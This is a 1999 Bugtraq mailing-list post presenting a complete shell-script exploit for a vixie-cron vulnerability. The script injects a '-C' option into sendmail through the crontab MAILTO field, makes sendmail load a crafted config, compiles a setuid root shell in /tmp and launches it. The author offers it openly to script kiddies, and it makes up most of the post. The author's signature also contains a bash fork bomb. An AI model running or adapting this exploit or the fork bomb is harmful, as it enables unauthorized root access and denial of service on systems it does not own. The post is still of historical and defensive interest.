Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Root shell vixie cron exploit

From: lcamtuf () IDS PL (Michal Zalewski)
Date: Mon, 5 Jul 1999 14:20:49 +0200

For script kiddiez, here's an exploit for recent vixie-cron vulnerability,
giving instant root shell. Thought it will help script kiddies, but as
Martin Schulze included almost step-by-step guide how to abuse Sendmail
flags, this exploit won't bring anything shocking - simply, it's working
example.

** Official statement on my hwclock settings: RTC on my mainboard is
** broken, and I have no cash to replace it with working one :( Just
** execuse me stupid 'Date:' fields in some of my postings...

_______________________________________________________________________
Michal Zalewski [lcamtuf () ids pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]


#!/bin/sh

clear

echo '------------------------------------------------------------------'
echo 'Marchew Hyperreal Industries                <marchew () dione ids pl>'
echo 'Stumilowy Las Team                       <100milowy () gdynia ids pl>'
echo '---------------------------- presents ----------------------------'
echo 
echo ' -= vixie-cron root sploit by Michal Zalewski <lcamtuf () ids pl> =-'
echo

echo '[+] Checking dependencies:'

echo -n '   [*] vixie crontab: '

if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then
  echo "OK"
else
  echo "NOT FOUND!"
  exit 1
fi

echo -n '   [*] Berkeley Sendmail: '

if [ -f /usr/sbin/sendmail ]; then
  echo "OK"
else
  echo "NOT FOUND!"
  exit 1
fi

echo -n '   [*] gcc compiler: '

if [ -x /usr/bin/gcc ]; then
  echo "OK"
else
  echo "NOT FOUND!"
  exit 1
fi

echo '   [?] Dependiences not verified:'
echo '      [*] proper version of vixie crontab'
echo '      [*] writable /tmp without noexec/nosuid option'
echo '[+] Exploit started.'

echo "[+] Setting up .cf file for sendmail..."

cat >/tmp/vixie-cf <<__eof__
V7/Berkeley

O QueueDirectory=/tmp
O DefaultUser=0:0

R$+             \$#local $: \$1         regular local names

Mlocal,         P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,
                T=DNS/RFC822/X-Unix,
                A=vixie-root
__eof__

echo '[+] Setting up phase #1 tool (phase #2 tool compiler)...'

cat >/tmp/vixie-root <<__eof__
#!/bin/sh

gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d
chmod 6755 /tmp/vixie-own3d
__eof__

chmod 755 /tmp/vixie-root

echo '[+] Setting up phase #2 tool (rootshell launcher)...'

cat >/tmp/vixie-own3d.c <<__eof__
main() {
  setuid(0);
  setgid(0);
  unlink("/tmp/vixie-own3d");
  execl("/bin/sh","sh","-i",0);
}
__eof__

echo '[+] Putting evil crontab entry...'

crontab - <<__eof__
MAILTO='-C/tmp/vixie-cf dupek'
* * * * * nonexist
__eof__

echo '[+] Patience is a virtue... Wait up to 60 seconds.'

ILE=0

echo -n '[+] Tick.'

while [ $ILE -lt 50 ]; do
  sleep 2
  let ILE=ILE+1
  test -f /tmp/vixie-own3d && ILE=1000
  echo -n '.'
done

echo
echo '[+] Huh, done. Removing crontab entry...'

crontab -r

echo '[+] Removing helper files...'

rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* &>/dev/null

echo '[*] And now...'

if [ -f /tmp/vixie-own3d ]; then
  echo '[+] Entering root shell, babe :)'
  echo
  /tmp/vixie-own3d
  echo
else
  echo '[-] Oops, no root shell found, patched system or configuration problem :('
fi

echo '[*] Exploit done.'
Previous By Date Next
Previous By Thread Next

Current thread: